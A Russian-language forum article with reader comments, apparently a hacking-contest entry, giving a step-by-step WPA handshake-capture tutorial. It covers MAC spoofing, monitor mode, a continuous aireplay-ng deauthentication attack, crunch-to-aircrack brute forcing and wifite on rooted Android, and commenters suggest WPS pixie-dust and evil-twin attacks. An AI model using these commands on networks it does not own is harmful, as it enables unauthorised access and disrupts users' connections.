• 15 апреля стартует «Курс «SQL-injection Master» ©» от команды The Codeby

    За 3 месяца вы пройдете путь от начальных навыков работы с SQL-запросами к базам данных до продвинутых техник. Научитесь находить уязвимости связанные с базами данных, и внедрять произвольный SQL-код в уязвимые приложения.

    На последнюю неделю приходится экзамен, где нужно будет показать свои навыки, взломав ряд уязвимых учебных сайтов, и добыть флаги. Успешно сдавшие экзамен получат сертификат.

    Запись на курс до 25 апреля. Получить промодоступ ...

Статья для участия в конкурсе на codeby.

Приветствую всех дорогие форумчане. Я надеюсь вам понравится цикл моих статей по атакам на беспроводные сети.

Введение.
В этой и последующих частях мы будем проводить атаки на беспроводые сети( в моем случае я буду тестировать свою сеть). Также мы познакомимся с новыми фреймворками и различными утилитами для проведения данного рода атак.

В начале мы начнем с получения доступа к сети, то есть научимся осуществлять различные способы взлома точек доступа. Далее перейдем к атакам на самих пользователей сети, также попробуем получить полный контроль над сетью.
На этом описание закончено. Теперь перейдем к главному.

Взлом wifi.

Существует много способов получения доступа от тд(точка доступа):

  • Похищение handshake(рукопожатие)
  • Подбор wps ключа.
  • Фишинг(и даже он)
В этой части мы рассмотрим похищение рукопожатия. Нам понадобится пакет утилит aircrack и много свободного времени.
В конце этой части также будет описан этот способ взлома, но только с использованием смартфона на базе android.

Шаг 1.


Перед началом взлома нужно позаботиться о своей безопасности. Давайте сменим свой MAC - адрес.
Узнаем интерфейс своей сетевой карты.
Код:
iwconfig

Как видем у меня это wlan0.

Screenshot from 2017-10-30 12-12-41.png

Далее прописываем 3 простенькие команды.
Код:
ifconfig wlan0 down # отключаем интерфейс
macchanger -r wlan0 # меняем mac
ifconfig wlan0 up # запускаем интерфейс
wlan0 - это интерфейс моей сетевой карты.
r - параметр устанавливающий рандомный MAC.

Все отлично. Мы сменили MAC


Screenshot from 2017-10-30 12-13-21.png


О безопасности мы позаботились, теперь неплохо бы начать.

Шаг 2.

Чтобы начать взлом необходимо перевести нашу сетевую карту в режим мониторинга. Это режим в котором мы сможем видеть большинство точек доступа которые нас окружают, мы можем видеть всю необходимую информацию которая нам понадобится в дальнейшем.
Код:
airmon-ng start wlan0

airmon-ng - это самый маленький пакет который используется для включения режима мониторинга(в частности).

Screenshot from 2017-10-30 12-14-32.png


Как видим теперь название нашего сетевого интерфейса сменилось на - wlan0mon.

Теперь необходимо убить процессы которые могут помешать нам.
Код:
kill 1091
kill 1239

Подготовка подошла к концу. Теперь начнется самое интересное.

Шаг 3.

Нам нужно узнать какие точки находятся вблизи нас.
Воспользуемся airodump-ng.
Вобще airodump - это инструмент для захвата пакетов.
Код:
airodump-ng wlan0mon

Screenshot from 2017-10-30 12-15-49.png


Что же мы получаем очень много информации.
(Для остановки сканирования просто зажмите CTRL+C)

Для начало обратим внимание на канал на котором "висит" ваша цель. Сейчас мы поступим таким образом:
Будем глушить сигнал сети и одновременно с этим сканировать сеть ожидая рукопожатие. Мы получаем его при деаудентификации пользователя сети.

Во первых. Открываем новое окно в терминале и пишем
Код:
iwconfig wlan0mon channel 10
Тем самым мы "повесили" нашу сетевую карту на прослушку 11-ого канала.
Далее начнем глушить сигнал сети(атака wifi jammer)
Код:
aireplay-ng -0 0 -a <bssid> wlan0mon
Screenshot from 2017-10-30 12-16-41.png

BSSID - это своеобразный MAC точки доступа.
ESSID - это имя точки доступа.

a - параметр указывающий bssid
0 - параметр указывающий количество деаудентификаций пользователей.

Во вторых. Теперь попробуем получить рукопожатие(это долгий процесс).
Код:
airodump-ng --bssid <bssid> -w file wlan0mon
Теперь осталось подождать когда пользователь сети деавторизируется.

Screenshot from 2017-10-30 12-20-09.png


Ну вот мы и получили рукопожатие.

Теперь осталось "выбить из него все ценное".

Шаг 4.

Для получения пароля вместо использования баз паролей мы просто подключим crunch к aircrack по тунелю. Но нам нужно будет предполагать возможную длину пароля. Мы знаем что возможная минимальная длина это 8 символов. Допустим это и есть длина . Тогда вся наша конструкция будет выглядеть так
Код:
crunch 8 8 abcdefghijklmnopqrstuvwxyz1234567890.-_ | aircrack-ng -w - file.cap -b <bssid>
Это займет очень много времени. Также советую наблюдать за температурой процессора.
Screenshot from 2017-10-30 12-57-17.png

Надоже, все сработало успешно. Но все таки мы не можем точно знать из чего состоит пароль, его длинну, присутствуют ли различия регистра и.т.п.

Взлом с android.

Нам понадобится рутированый андроид. Если у вас нет root прав, то обязательно рутируйте.
Что же, теперь идем в play market и скачиваем Termux.
После установки Termux осталось опять же установить на него wifite.
Код:
1. apt update && apt upgrade
2. apt install git  && apt install python -y
3. git clone https://github.com/derv82/wifite
4. cd wifite
5. chmod +x wifite.py
6. ./wifite.py

Об использовании wifite я расскажу в следующей части.
На этом первая часть подошла к концу!
 
V

Vankesha

Очень интересный, простой и понятный стиль подачи у тебя. Информация доходит с лёгкостью и это отлично. Спасибо!
 
  • Нравится
Реакции: el_gis и Kalina
I

IioS

Очень интересный, простой и понятный стиль подачи у тебя. Информация доходит с лёгкостью и это отлично. Спасибо!
Похвалил, а лайк не поставил...
Это займет очень много времени.
То что ты предлагаешь "crunch 8 8 abcdefghijklmnopqrstuvwxyz1234567890.-_" займет не то что - очень много, а Невероятно много! Да и к тому ж не очень эффективно, лучше начать перебирать по ТОП словарям(топ-100, топ-9999 и т.д.), ну а потом если ты Очень отчаялся(из-за отсутствия ответа), уже можно начать твой метод.
 
  • Нравится
Реакции: id2746 и yarr

valerian38

Grey Team
20.07.2016
662
763
BIT
43
Думаю участие в конкурсе подразумевает публикацию эксклюзивного материала. Материал опубликованый в данной статье, имеет множество клонов во всемирной паутине. Поэтому статья "НИКАК". Без обид.
 

vag4b0nd

Green Team
24.05.2017
303
1 472
BIT
30
Думаю участие в конкурсе подразумевает публикацию эксклюзивного материала. Материал опубликованый в данной статье, имеет множество клонов во всемирной паутине. Поэтому статья "НИКАК". Без обид.
Сейчас практически нет тем которые не описаны "во всемирной паутине". Приходится Добовлять что-то свое, но статья отличная от остальных врятли получится.
 
  • Нравится
Реакции: Сергей Попов
V

Vankesha

Похвалил, а лайк не поставил...

То что ты предлагаешь "crunch 8 8 abcdefghijklmnopqrstuvwxyz1234567890.-_" займет не то что - очень много, а Невероятно много! Да и к тому ж не очень эффективно, лучше начать перебирать по ТОП словарям(топ-100, топ-9999 и т.д.), ну а потом если ты Очень отчаялся(из-за отсутствия ответа), уже можно начать твой метод.
Ох, а я м не думал что тут лайки нужно ставить, и не видел, честно говоря. Спасибо что проинформировал
 
G

Gl@balWar

Сейчас практически нет тем которые не описаны "во всемирной паутине". Приходится Добовлять что-то свое, но статья отличная от остальных врятли получится.
Вот тут ты ошибаешься. Суть конкурса - написать что то новое. От себя. Или же затронуть тему, которая всех интересует, но с другого подхода.
 
  • Нравится
Реакции: Tihon49

Axon

Green Team
04.01.2017
70
77
BIT
0
Соглашусь, что аналогов этой статьи очень много. Однако информация подана правильно и некоторые моменты, например: wlan0 down и wlan0 up для смены MACa, когда я впервые пробовал этот метод пришлось потратить некоторое количество времени на поиск именно этого, так как в статье этого не было, а линукс был для меня темным лесом, пусть и не тянет на статью для конкурса, но вме равно лайк.
 
  • Нравится
Реакции: Kalina

Сергей Попов

Кодебай
30.12.2015
4 693
6 588
BIT
344
Вот тут ты ошибаешься. Суть конкурса - написать что то новое. От себя. Или же затронуть тему, которая всех интересует, но с другого подхода.
Ок, ок. Покажи как надо на личном примере.
[doublepost=1509381929,1509380986][/doublepost]
участие в конкурсе подразумевает публикацию эксклюзивного материала
Авторского. С описанием личного опыта.

П.С. Автору, за смелость быть первым участником, даю балл репутации. Спасибо!
 

OBLIVIONNN

Green Team
22.08.2017
144
92
BIT
1
Статья хорошая но вот вопрос.
Разве Wifite работает на Android ? для него же нужен Aircrack-ng, нужно каким то чудом его установить, а если и установить то нужно еще и подключить WI-FI адаптер через OTG кабель, так как стандартный Android вифи адаптер не поддерживает Monitor-mod(в принципе можно и BCMON но он же не для всех андроид).
 
  • Нравится
Реакции: Tihon49

BarDimNik

Green Team
23.09.2016
28
16
BIT
0
Статья хорошая! Но много статей в интернете старые, т.к. софт и интерфейс софта обновляется, то нужно писать новые статьи и обновлять старые, а этим мало (почти никто) занимается. Автору статьи - продолжайте! Вы молодец.
 

id2746

Green Team
12.11.2016
435
644
BIT
14
Статья хорошая! Но много статей в интернете старые, т.к. софт и интерфейс софта обновляется, то нужно писать новые статьи и обновлять старые, а этим мало (почти никто) занимается. Автору статьи - продолжайте! Вы молодец.
Посмотри на пакет эйркрэк сейчас и 10 лет назад, много отличий?
@ITman2K17, команду airodump-ng wlan0mon рекомендую сразу вводить с ключем --wps, это даст больше информации, и возможно позволит избежать лишних шагов, например брутфорса.
И ещё совет: атаку на wifi следует начинать с pixie dust по wps.
Плюс вам поставил. Удачи!
 
  • Нравится
Реакции: Tihon49 и IioS

kallibr44

Green Team
20.06.2017
18
6
BIT
0
Способ старый как гугл. Ты лучше расскажи про "пиксельную пыль" либо злого двойника, хотя и об этом думаю знают все.
 

BarDimNik

Green Team
23.09.2016
28
16
BIT
0
Посмотри на пакет эйркрэк сейчас и 10 лет назад, много отличий?
@ITman2K17, команду airodump-ng wlan0mon рекомендую сразу вводить с ключем --wps, это даст больше информации, и возможно позволит избежать лишних шагов, например брутфорса.
И ещё совет: атаку на wifi следует начинать с pixie dust по wps.
Плюс вам поставил. Удачи!
Спасибо Вам за подсказки!
 
R

remez

Можно добавить, что не мешает проверить перед брутом хендшейк на Шарке ( снифере) на предмет принятия всех 4 рукопожатий. А то бывают "битые" хендшейки.
 
  • Нравится
Реакции: Pkp
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!